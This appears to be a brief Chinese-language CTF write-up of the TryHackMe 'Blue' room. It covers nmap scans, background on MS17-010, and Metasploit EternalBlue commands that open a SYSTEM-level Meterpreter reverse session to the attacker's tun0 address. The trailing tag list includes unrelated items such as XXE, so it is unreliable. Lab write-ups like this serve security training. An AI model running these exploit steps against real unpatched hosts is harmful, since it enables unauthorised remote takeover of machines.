Mstfanayef/HTB-Blue-Writeup

# Blue — EternalBlue (MS17-010) **平台：** TryHackMe **操作系统：** Windows 7 Professional SP1 x64 **难度：** 简单 **CVE：** CVE-2017-0143 **访问权限：** NT AUTHORITY\SYSTEM ## 1. 枚举 ``` nmap -sV 10.113.162.73 ``` 开放端口： - 135 — Windows RPC - 139 — NetBIOS - 445 — SMB (Windows 7 SP1) - 3389 — RDP **漏洞扫描：** ``` nmap --script vuln -p 445 10.113.162.73 ``` 结果：该机器存在 **MS17-010 (EternalBlue)** 漏洞。 ## 2. 漏洞详情 MS17-010 是 SMBv1 中的一个关键远程代码执行漏洞。它最初由美国国家安全局（NSA）开发，于2017年被Shadow Brokers泄露，后来被用于WannaCry勒索软件攻击。该漏洞允许通过精心构造的SMB数据包引发缓冲区溢出，从而实现系统级代码执行。 ## 3. 漏洞利用 ``` msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.113.162.73 set LHOST tun0 run ``` 结果：Meterpreter 会话已成功建立。 ## 4. 权限提升 无需进行 — EternalBlue 漏洞利用直接以 **NT AUTHORITY\SYSTEM** 权限执行。

标签：CTF挑战, CTI, EternalBlue, Hack The Box, nmap扫描, SMB枚举, TryHackMe, Windows 7, Windows漏洞, XXE攻击, 初学者友好, 协议分析, 安全测试, 插件系统, 攻击性安全, 教学实验, 权限提升, 系统权限, 编程工具, 网络安全, 远程代码执行, 隐私保护